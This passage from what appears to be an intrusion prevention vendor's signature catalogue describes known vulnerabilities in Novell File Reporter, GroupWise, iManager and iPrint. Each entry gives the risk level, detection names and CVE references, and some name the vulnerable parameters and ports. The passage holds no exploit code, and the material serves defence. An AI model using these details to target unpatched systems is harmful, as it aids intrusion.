Description: A file retrieval vulnerability exists in Novell File Reporter. The vulnerability is caused by insufficient authentication when handling SRS requests. An remote unauthenticated attacker could exploit this vulnerability by sending a specially crafted request to the server. Successful exploitation could result in arbitrary file retrieval with SYSTEM privileges.
Situation: HTTP_CS-Novell-File-Reporter-SRS-Arbitrary-File-Retrieval
References:
CVE-2012-4957
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4957
BID-56579
http://www.securityfocus.com/bid/56579
OSVDB-87573
http://www.osvdb.org/87573
Back to top

Novell-File-Reporter-Vol-Tag-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Novell File Reporter
Risk: High
First detected in: sgpkg-ips-494-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell File Reporter
Type: Buffer Overflow
Description: A heap buffer overflow exists in Novell File Reporter. The vulnerability is caused by insufficient bounds checking when handling SRS requests with multiple VOL tags. The resulting unbounded input can overflow a fixed size heap buffer. An remote unauthenticated attacker could exploit these vulnerabilities by sending specially crafted requests to the server. Successful exploitation could result in a heap buffer overflow resulting in code execution with SYSTEM privileges.
Situation: Generic_CS-Novell-File-Reporter-Vol-Tag-Heap-Buffer-Overflow
References:
CVE-2012-4956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4956
BID-56579
http://www.securityfocus.com/bid/56579
OSVDB-87574
http://www.osvdb.org/87574
Back to top

Novell-File-Reporter-Vol-Tag-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Novell File Reporter
Risk: Moderate
First detected in: sgpkg-ips-486-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell File Reporter
Type: Buffer Overflow
Description: There is a stack buffer overflow exists in NFRAgent.exe, a component of Novell File Reporter. The vulnerability is due to insufficient validation of the XML VOL tag in data received from the network. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted message to the affected service. Successful exploitation could lead to arbitrary code execution in the context of the affected service, which is SYSTEM.
Situation: Generic_CS-Novell-File-Reporter-Vol-Tag-Stack-Buffer-Overflow
References:
OSVDB-85503
http://www.osvdb.org/85503
Back to top

Novell-Groupwise-Addressbook-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Novell GroupWise
Risk: Moderate
First detected in: sgpkg-ips-444-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell GroupWise
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability has been identified in Novell Groupware Client. An attacker can exploit this vulnerability by enticing a user to open a malformed Novell Address Book file (.nab) containing an overly long token. A successful attack would lead to injection and execution of arbitrary code in the security context of the target user. If the code execution attempt does not succeed, the application may terminate abnormally.
Situation: File-TextId_Novell-Groupwise-Addressbook-Heap-Buffer-Overflow
References:
CVE-2011-4189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4189
OSVDB-79720
http://www.osvdb.org/79720
Back to top

Novell-Groupwise-Admin-Service-Fileuploadservlet-Directory-Traversal

About this vulnerability: A vulnerability in Novell GroupWise
Risk: Moderate
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell GroupWise
Type: Directory Traversal
Description: A directory traversal vulnerability exists within the Administration Service of Novell GroupWise 2014. The vulnerability is due to a flaw in handling of a parameter in the FileUploadServlet servlet. A remote unauthenticated attacker can exploit this vulnerability by sending crafted requests to the vulnerable service. Successful exploitation allows an attacker to disclose or destroy arbitrary files on the server.
Situation: HTTP_CS-Novell-Groupwise-Admin-Service-Fileuploadservlet-Directory-Traversal
References:
CVE-2014-0600
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0600
OSVDB-110461
http://www.osvdb.org/110461
Back to top

Novell-Groupwise-Agents-HTTP-Request-Remote-Code-Execution

About this vulnerability: A vulnerability in Novell GroupWise
Risk: High
First detected in: sgpkg-ips-381-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell GroupWise
Type: Buffer Overflow
Description: A code execution vulnerability exists in the GroupWise agents HTTP interfaces. The vulnerability is due to a stack buffer overflow while the gwpoa.exe, gwmta.exe and gwia.exe handle HTTP requests. A remote attacker could exploit this vulnerability by sending a crafted HTTP request to the server. Successful exploitation of this vulnerability could allow for the injection and execution of arbitrary code on the target system with System-level privileges.
Situation: HTTP_CSH-Oversized-Host-Header-Field
References:
BID-44732
http://www.securityfocus.com/bid/44732
Back to top

Novell-Groupwise-Client-ActiveX-Gwabdlg.dll-Untrusted-Pointer-Dereference

About this vulnerability: A vulnerability in Novell GroupWise Client for Windows
Risk: Moderate
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell GroupWise Client for Windows
Type: Malfunction
Description: There is an untrusted pointer dereference vulnerability in the InvokeContact() and GenerateSummaryPage() functions in the gwabdlg.dll component of Novell GroupWise Client for Windows. These functions can be called using an ActiveX control. This vulnerability can be exploited by remote attackers by enticing a user to open a malicious web page. Successful exploitation could result in arbitrary code execution in the context of the currently logged on user.
Situation: File-Text_Novell-Groupwise-ActiveX-Gwabdlg.dll-Untrusted-Pointer-Dereference
References:
CVE-2013-0804
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0804
OSVDB-89699
http://www.osvdb.org/89699
Back to top

Novell-Groupwise-Client-ActiveX-Gwmim1.ocx-Untrusted-Pointer-Dereference

About this vulnerability: A vulnerability in Novell GroupWise Client for Windows
Risk: Moderate
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell GroupWise Client
Type: Malfunction
Description: There is an untrusted pointer dereference vulnerability exists in SecManageRecipientCertificates() function in gwmim1.ocx component of Novell GroupWise Client for Windows. This function can be called using an ActiveX control. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to open a malicious web page. Successful exploitation could result in arbitrary code execution in the context of the currently logged on user.
Situation: File-Text_Novell-Groupwise-Client-Gwmim1.ocx-Untrusted-Pointer-Dereference
References:
CVE-2013-0804
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0804
Back to top

Novell-Groupwise-Client-For-Windows-ActiveX-Code-Execution

About this vulnerability: A vulnerability in Novell GroupWise Client for Windows
Risk: Moderate
First detected in: sgpkg-ips-510-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell GroupWise Client for Windows
Type: Malfunction
Description: A remote code execution vulnerability exists in the ActiveX control for Novell GroupWise Client for Windows. A remote attacker could exploit this vulnerability by enticing a target to view a specially crafted webpage. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user. Unsuccessful exploitation could cause the application to terminate abnormally, resulting in a denial-of-service condition.
Situation: File-Text_Novell-Groupwise-Client-For-Windows-Vulnerable-Method-Usage
References:
CVE-2012-0439
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0439
OSVDB-89700
http://www.osvdb.org/89700
Back to top

Novell-Groupwise-Client-Img-Tag-Src-Parameter-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Novell GroupWise Client
Risk: High
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-1729-5242
Platform: Windows
Software: Novell GroupWise Client
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Novell GroupWise Client. The vulnerability is due to a boundary error when processing crafted e-mails, containing malicious HTML IMG tags. A remote unauthenticated attacker could exploit this vulnerability by sending malicious e-mails to the target user. Successful exploitation allows arbitrary code injection and execution with the privileges of the client process, normally equal to the privileges of the currently logged-in user.
Situation: SMTP_CS-Novell-Groupwise-Client-Img-Tag-Src-Parameter-Buffer-Overflow
File-Text_Novell-Groupwise-Client-Img-Tag-Src-Parameter-Buffer-Overflow-2
References:
CVE-2007-6435
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6435
BID-26875
http://www.securityfocus.com/bid/26875
OSVDB-40870
http://www.osvdb.org/40870
Back to top

Novell-Groupwise-HTTP-Interfaces-Arbitrary-File-Retrieval

About this vulnerability: A vulnerability in Novell GroupWise Internet Agent
Risk: Moderate
First detected in: sgpkg-ips-513-5211
Last changed: sgpkg-ips-1453-5242
Platform: Generic
Software: Novell GroupWise
Type: Directory Traversal
Description: There is a directory traversal vulnerability in the HTTP interfaces of Novell GroupWise Post Office Agent, Message Transfer Agent and Internet Agent. The vulnerability is due to a failure to sanitize the request URI for directory traversal characters. A remote unauthenticated attacker can exploit this vulnerability by sending specially crafted HTTP requests to a vulnerable interface. Successful exploitation allows an attacker to retrieve arbitrary files with the permissions of the GroupWise agents, normally System on Windows platforms.
Situation: HTTP_CSU-Novell-Groupwise-HTTP-Interfaces-Arbitrary-File-Retrieval
References:
CVE-2012-0419
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0419
BID-55648
http://www.securityfocus.com/bid/55648
OSVDB-85801
http://www.osvdb.org/85801
Back to top

Novell-Groupwise-iCal-RRULE-Time-Conversion-Invalid-Array-Indexing

About this vulnerability: A vulnerability in Novell Groupwise
Risk: Moderate
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell GroupWise
Type: Malfunction
Description: There is an array indexing vulnerability in the GroupWise Internet Agent. The vulnerability is due to improper handling of iCal files attached to e-mails. Specifically, when parsing an RRULE that recurs yearly, the application improperly validates the user-controlled values, which are later used as an index to an array. A remote unauthenticated attacker can exploit this vulnerability by sending an e-mail with a specially crafted iCal file to a vulnerable server. Successful exploitation can result in the execution of arbitrary code with the context of the affected application, which is normally SYSTEM.
Situation: File-TextId_Novell-Groupwise-iCal-RRULE-Time-Conversion-Invalid-Array-Indexing
References:
CVE-2011-2663
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2663
OSVDB-75769
http://www.osvdb.org/75769
Back to top

Novell-Groupwise-Internet-Agent-Content-Type-Buffer-Overflow

About this vulnerability: A vulnerability in Novell Groupwise
Risk: High
First detected in: sgpkg-ips-381-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell GroupWise
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Novell GroupWise Internet Agent (GWIA). The vulnerability is due to improper validation of data received within the Content-Type header of received messages. An unauthenticated remote attacker could exploit this vulnerability to execute arbitrary code on the targeted vulnerable installations of GWIA under the context of the SYSTEM user.
Situation: E-Mail_HCS-Novell-Groupwise-Internet-Agent-Content-Type-Buffer-Overflow
References:
BID-44732
http://www.securityfocus.com/bid/44732
Back to top

Novell-Groupwise-Internet-Agent-Email-Address-Processing-BOF

About this vulnerability: Novell GroupWise Internet Agent Email Address Processing Buffer Overflow
Risk: High
First detected in: sgpkg-ips-223-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell GroupWise
Type: Buffer Overflow
Description: There exists a stack buffer overflow vulnerability in the Novell GroupWise. The vulnerability is due to an error while processing specially crafted SMTP requests. Remote attackers can exploit this vulnerability to execute arbitrary code on the target server. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute with the security privileges of the server. In an attack case where code injection is not successful, the affected process will terminate abnormally.
Situation: SMTP_Mail-From-Recipient-Name-BOF
References:
CVE-2009-1636
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1636
BID-35064
http://www.securityfocus.com/bid/35064
OSVDB-54645
http://www.osvdb.org/54645
OSVDB-54644
http://www.osvdb.org/54644
Back to top

Novell-Groupwise-Internet-Agent-HTTP-Interface-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Novell GroupWise
Risk: Moderate
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Novell GroupWise
Type: Buffer Overflow
Description: There is a remote code execution vulnerability in the Novell GroupWise Internet Agent (GWIA) HTTP interface (port 9850/tcp). The vulnerability is due to a boundary error when parsing overly long HTTP requests to certain .css resources. An unauthenticated remote attacker could exploit this vulnerability to execute arbitrary code on targeted vulnerable installations of GWIA in the context of the SYSTEM user.
Situation: HTTP_CSU-Novell-Groupwise-Internet-Agent-HTTP-Interface-Stack-Buffer-Overflow
References:
CVE-2011-0334
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0334
BID-49779
http://www.securityfocus.com/bid/49779
OSVDB-75774
http://www.osvdb.org/75774
Back to top

Novell-Groupwise-Internet-Agent-ICalendar-Parsing-Denial-Of-Service

About this vulnerability: A vulnerability in Novell GroupWise
Risk: Moderate
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell GroupWise
Type: Malfunction
Description: There is a denial of service vulnerability in Novell GroupWise Internet Agent. The vulnerability is due to insufficient validation of the length of time and date information when parsing a received iCalendar message. A remote attacker could exploit this vulnerability by sending an e-mail with a specially crafted .ics attachment to the vulnerable server. Successful exploitation would result in a denial-of-service condition.
Situation: File-TextId_Novell-Groupwise-Internet-Agent-ICalendar-Parsing-Denial-Of-Service
References:
CVE-2011-3827
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3827
BID-55574
http://www.securityfocus.com/bid/55574
Back to top

Novell-Groupwise-Internet-Agent-IMAP-Service-CREATE-Command-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Novell GroupWise Internet Agent IMAP Service
Risk: Critical
First detected in: sgpkg-ips-325-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Novell GroupWise
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Novell GroupWise Internet Agent IMAP Service. A remote authenticated attacker can exploit this vulnerability by sending a crafted CREATE command with an excessively long mailbox name to execute arbitrary System-level code.
Situation: IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Create-Command
References:
BID-41704
http://www.securityfocus.com/bid/41704
Back to top

Novell-Groupwise-Internet-Agent-RCPT-Command-Buffer-Overflow

About this vulnerability: A vulnerability in Novell Groupwise
Risk: High
First detected in: sgpkg-ips-288-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell GroupWise
Type: Buffer Overflow
Description: There exists a stack buffer overflow vulnerability in the Novell GroupWise. The vulnerability is due to a boundary error while processing specially crafted SMTP request. Remote attackers can exploit this vulnerability to execute arbitrary code on the target server. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute with the security privileges of the server. In an attack case where code injection is not successful, the affected process will terminate abnormally.
Situation: SMTP_Novell-Groupwise-Internet-Agent-RCPT-Command-Buffer-Overflow
References:
CVE-2009-0410
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0410
BID-33560
http://www.securityfocus.com/bid/33560
Back to top

Novell-Groupwise-Internet-Agent-RRULE-Parsing-BOF

About this vulnerability: A buffer overflow vulnerability in the Novell GroupWise Internet Agent
Risk: Critical
First detected in: sgpkg-ips-365-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Novell GroupWise
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Novell GroupWise Internet Agent. A remote unauthenticated attacker can exploit this vulnerability by sending a malicious e-mail to the vulnerable target system to cause a denial of service condition or execute arbitrary code with SYSTEM privileges.
Situation: SMTP_CS-Novell-Groupwise-Internet-Agent-RRULE-Parsing-BOF
References:
BID-44732
http://www.securityfocus.com/bid/44732
Back to top

Novell-Groupwise-Internet-Agent-RRULE-Weekday-Parsing-Buffer-Overflow

About this vulnerability: A vulnerability in Novell Groupwise
Risk: Moderate
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell GroupWise
Type: Buffer Overflow
Description: There is a remote code execution vulnerability in Novell GroupWise Internet Agent (GWIA). The vulnerability is due to a buffer overflow when parsing a VCALENDAR Weekday RRULE variable in an email. An unauthenticated remote attacker could exploit this vulnerability by sending a malicious email to the target. In a successful attack, the behavior of the target machine depends on the intention of the injected code, which runs in the security context of the SYSTEM. In an unsuccessful attack, the vulnerable application may terminate abnormally.
Situation: File-TextId_Novell-Groupwise-Internet-Agent-RRULE-Weekday-Parsing
References:
CVE-2011-2662
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2662
OSVDB-75770
http://www.osvdb.org/75770
Back to top

Novell-Groupwise-Internet-Agent-SMTP-Auth-Login-Command-Buffer-Overflow

About this vulnerability: Novell GroupWise Internet Agent SMTP AUTH LOGIN Command Buffer Overflow
Risk: High
First detected in: sgpkg-ips-223-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell GroupWise
Type: Buffer Overflow
Description: There exists a stack buffer overflow vulnerability in Novell GroupWise. The vulnerability is due to an error while processing specially crafted SMTP AUTH LOGIN requests. Remote attackers can exploit this vulnerability to execute arbitrary code on the target server. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute with the security privileges of the server.
Situation: SMTP_CS-Novell-Groupwise-Auth-Login-BOF
References:
CVE-2009-1636
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1636
BID-35065
http://www.securityfocus.com/bid/35065
OSVDB-54645
http://www.osvdb.org/54645
OSVDB-54644
http://www.osvdb.org/54644
Back to top

Novell-Groupwise-Messenger-Client-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Novell GroupWise Messenger Client
Risk: High
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell GroupWise Messenger
Type: Input Validation
Description: There exists a buffer overflow vulnerability in Novell GroupWise Messenger Client.
Situation: File-TextId_Novell-Groupwise-Messenger-Client-Buffer-Overflow
References:
CVE-2008-2703
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2703
BID-29602
http://www.securityfocus.com/bid/29602
Back to top

Novell-Groupwise-Messenger-HTTP-Response-Handling-Stack-Overflow

About this vulnerability: A vulnerability in Novell GroupWise Messenger Client (GWIM) for Windows
Risk: High
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Novell GroupWise Messenger
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Novell GroupWise Messenger product. The flaw is due to improper handling of crafted HTTP responses. An unauthenticated remote attacker can exploit this vulnerability by sending spoofed HTTP responses to the target host. Successful attack could allow for arbitrary code execution with privileges of the currently logged in user.
Situation: Generic_SS-Novell-Groupwise-Messenger-HTTP-Response-Handling-Stack-Overflow
References:
CVE-2008-2703
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2703
BID-29602
http://www.securityfocus.com/bid/29602
Back to top

Novell-Groupwise-Messenger-Nmma.exe-Createsearch-Memory-Corruption

About this vulnerability: A vulnerability in Novell GroupWise Messenger
Risk: High
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Novell GroupWise Messenger
Type: Malfunction
Description: There is a heap memory corruption vulnerability in Novell GroupWise Messenger. Specifically, the vulnerability is caused by improper handling of crafted parameters when processing a request to /createsearch. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target service on port 8300/TCP. Successful exploitation could allow remote code execution in the context of the target service, which is SYSTEM.
Situation: HTTP_CRL-Novell-Groupwise-Messenger-Nmma.exe-Createsearch-Memory-Corruption
Back to top

Novell-Groupwise-Messenger-Nmma.exe-Login-Memory-Corruption

About this vulnerability: A vulnerability in Novell GroupWise Messenger
Risk: High
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell GroupWise Messenger
Type: Malfunction
Description: There is a heap memory corruption vulnerability in Novell GroupWise Messenger. Specifically, the vulnerability is caused by improper parsing of crafted tags when processing a login message. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted login request to the target service (by default) on port 8300/TCP. Successful exploitation could possibly allow remote code execution under the context of the target service.
Situation: Generic_CS-Novell-Groupwise-Messenger-Nmma.exe-Login-Memory-Corruption
References:
BID-52056
http://www.securityfocus.com/bid/52056
Back to top

Novell-Groupwise-Messenger-Server-Process-Memory-Information-Disclosure

About this vulnerability: A vulnerability in Novell GroupWise Messenger
Risk: High
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell GroupWise Messenger
Type: Malfunction
Description: There is an information disclosure vulnerability in Novell Messenger Server. An error in the Messenger Server process, which occurs while processing certain commands, can result in the disclosure of the contents of arbitrary memory locations. Remote attackers may exploit this vulnerability by sending a specially crafted command to target server. Exploitation of this vulnerability would cause information disclosure or abnormal termination of the affected program.
Situation: Generic_CS-Novell-Groupwise-Messenger-Memory-Information-Disclosure
References:
CVE-2011-3179
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3179
BID-50443
http://www.securityfocus.com/bid/50443
OSVDB-76729
http://www.osvdb.org/76729
Back to top

Novell-Groupwise-WebAccess-Cross-Site-Scripting

About this vulnerability: A vulnerability in Novell Groupwise WebAccess
Risk: High
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell Groupwise WebAccess
Type: Input Validation
Description: A cross-site scripting vulnerability exists in Novell GroupWise WebAccess. The vulnerability is due to lack of input validation when handling email attachments. A remote, unauthenticated attacker can exploit this vulnerability by enticing a target user to view crafted web content. A successful exploitation attempt will result in the execution of script code in the current browser session of a target user.
Situation: File-Text_Novell-Groupwise-WebAccess-Cross-Site-Scripting
File-Text_Novell-Groupwise-WebAccess-Cross-Site-Scripting-2
References:
CVE-2014-0611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0611
Back to top

Novell-iManager-Class-Name-Remote-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Novell iManager
Risk: High
First detected in: sgpkg-ips-321-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Novell iManager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Novell iManager. The vulnerability is due to a boundary error when handling HTTP requests sent to the "/nps/servlet/webacc/" module. A remote authenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server, potentially causing arbitrary code execution with the privileges of the vulnerable application.
Situation: HTTP_CRL-Novell-iManager-Class-Name-Remote-Buffer-Overflow
References:
CVE-2010-1929
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1929
BID-40480
http://www.securityfocus.com/bid/40480
OSVDB-65737
http://www.osvdb.org/65737
Back to top

Novell-iManager-Create-Attribute-EnteredAttrName-Buffer-Overflow

About this vulnerability: A vulnerability in Novell iManager
Risk: High
First detected in: sgpkg-ips-449-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell iManager
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported in Novell iManager. The vulnerability is due to insufficient validation of the EnteredAttrName parameter when handling HTTP requests in the Create Attribute function. This may be exploited by remote, authenticated attackers to execute arbitrary code on the target server by sending a crafted HTTP POST request. In situations where code execution is successful the behaviour of the vulnerable server would depend on the intentions of the injected code, which will run in the security context of the SYSTEM user. When code execution is not successful the vulnerable service may terminate abnormally, leading to a denial-of-service condition.
Situation: HTTP_CRL-Novell-iManager-Create-Attribute-EnteredAttrName-Buffer-Overflow
References:
CVE-2011-4188
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4188
BID-40480
http://www.securityfocus.com/bid/40480
OSVDB-81026
http://www.osvdb.org/81026
Back to top

Novell-iManager-eDirectory-Plugin-Schema-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Novell iManager
Risk: High
First detected in: sgpkg-ips-278-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell iManager
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Novell iManager eDirectory plugin. The vulnerability is due to improper validation of user input. A remote, authenticated attacker can exploit this vulnerability by sending specially crafted parameters to the application. Successful exploitation of this vulnerability results in arbitrary code execution with the privileges of the SYSTEM user.
Situation: HTTP_CRL-Novell-iManager-eDirectory-Plugin-Schema-Buffer-Overflow
References:
CVE-2009-4486
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4486
BID-37672
http://www.securityfocus.com/bid/37672
OSVDB-61584
http://www.osvdb.org/61584
Back to top

Novell-iManager-Getmultipartparameters-Unauthorized-File-Upload

About this vulnerability: A vulnerability in Novell iManager
Risk: High
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell iManager
Type: Input Validation
Description: An unauthorized file upload vulnerability exists in Novell iManager. The vulnerability is due to insufficient validation of user input within the getMultiPartParameters() function. A remote attacker can leverage this vulnerability to upload arbitrary content to arbitrary files on the target system. Successful exploitation can lead to arbitrary code execution on a target system within the security context of the affected service. On Windows the service runs with the privileges of System.
Situation: HTTP_CS-Novell-iManager-Servlet-Modulemanager-Upload-Vulnerability
Back to top

Novell-iPrint-Client-ActiveX-Control-Buffer-Overflow

About this vulnerability: A Novell iPrint Client ActiveX Control Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Novell iPrint Client
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Novell iPrint Client 5.40 which allows remote attackers to execute arbitrary code by sending an overly long string to the debug parameter in ExecuteRequest() property of ienipp.ocx.
Situation: File-Text_Novell-iPrint-Client-ActiveX-Control-Buffer-Overflow
References:
CVE-2010-3106
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3106
OSVDB-66960
http://www.osvdb.org/66960
Back to top

Novell-iPrint-Client-ActiveX-Control-GetPrinterURLLList-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Novell iPrint Client
Risk: High
First detected in: sgpkg-ips-165-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Novell iPrint Client for Windows
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Novell iPrint Client. The vulnerability is caused by insufficient boundary checking when certain parameters are passed to the affected ActiveX control. An attacker may exploit this vulnerability by enticing a target user to open a malicious web page. Successful exploitation can lead to injection and execution of arbitrary code in the security context of the currently logged in user.
Situation: HTTP_SS-Novell-iPrint-Client-ActiveX-Control-GetPrinterURLList-Buffer-Overflow
File-Text_Novell-iPrint-Client-ActiveX-Control-GetPrinterURLList-Buffer-Overflow
References:
CVE-2008-2436
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2436
BID-30986
http://www.securityfocus.com/bid/30986
Back to top

Novell-iPrint-Client-ActiveX-Control-Multiple-Buffer-Overflows

About this vulnerability: Multiple vulnerabilities in Novell iPrint Client ActiveX control
Risk: High
First detected in: sgpkg-ips-189-2032
Last changed: sgpkg-ips-1729-5242
Platform: Windows
Software: Novell iPrint Client for Windows
Type: Buffer Overflow
Description: There are multiple buffer overflow vulnerabilities in the ActiveX control included within Novell iPrint Client. The vulnerabilities are caused by a insufficient boundary checking when certain parameters are passed to various methods exposed by the affected ActiveX control. An attacker may exploit this vulnerability by enticing a target user to open a malicious web page. Successful exploitation might lead to injection and execution of arbitrary code in the security context of the currently logged in user.
Situation: HTTP_SS-Novell-iPrint-Client-ActiveX-Control-GetDriverFile-BOF
HTTP_SS-Novell-iPrint-Client-ActiveX-Control-UploadPrinterDriver-BOF
HTTP_SS-Novell-iPrint-Client-ActiveX-Control-UploadResource-BOF
File-Text_Novell-iPrint-Client-ActiveX-Control-GetDriverFile-BOF
File-Text_Novell-iPrint-Client-ActiveX-Control-UploadResource-BOF
File-Text_Novell-iPrint-Client-ActiveX-Control-ExecuteRequest-Target-Frame-BOF
References:
CVE-2008-2431
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2431
BID-30813
http://www.securityfocus.com/bid/30813
Back to top

Novell-iPrint-Client-ActiveX-GetPrinterURLList2-Invalid-Free

About this vulnerability: A vulnerability in Novell iPrint Client for Windows
Risk: High
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell iPrint Client for Windows
Type: Malfunction
Description: A memory corruption vulnerability has been reported in Novell's iPrint Client ActiveX control. The vulnerability is due to the use of uninitialized pointers in a call to a free function. A remote, unauthenticated attacker could exploit this vulnerability to execute arbitrary code in the security context of the user. If code execution is unsuccessful, the application may terminate unexpectedly.
Situation: File-Text_Novell-iPrint-Client-ActiveX-GetPrinterURLList2-Invalid-Free
References:
CVE-2011-4185
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4185
OSVDB-78953
http://www.osvdb.org/78953
Back to top

Novell-iPrint-Client-Browser-Plugin-call-back-url-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Novell iPrint Client
Risk: Moderate
First detected in: sgpkg-ips-366-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Novell iPrint Client for Windows
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Novell iPrint Client. A remote attacker can exploit this vulnerability by enticing affected users to visit a malicious web page to execute arbitrary code in the context of the current user.
Situation: HTTP_SS-Novell-iPrint-Client-Browser-Plugin-call-back-url-Buffer-Overflow
File-Text_Novell-iPrint-Client-Browser-Plugin-call-back-url-Buffer-Overflow
References:
CVE-2010-1527
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1527
BID-42576
http://www.securityfocus.com/bid/42576
OSVDB-67411
http://www.osvdb.org/67411
Back to top

Novell-iPrint-Client-ExecuteRequest-debug-Parameter-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Novell iPrint Client
Risk: Moderate
First detected in: sgpkg-ips-366-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Novell iPrint Client for Windows
Type: Buffer Overflow
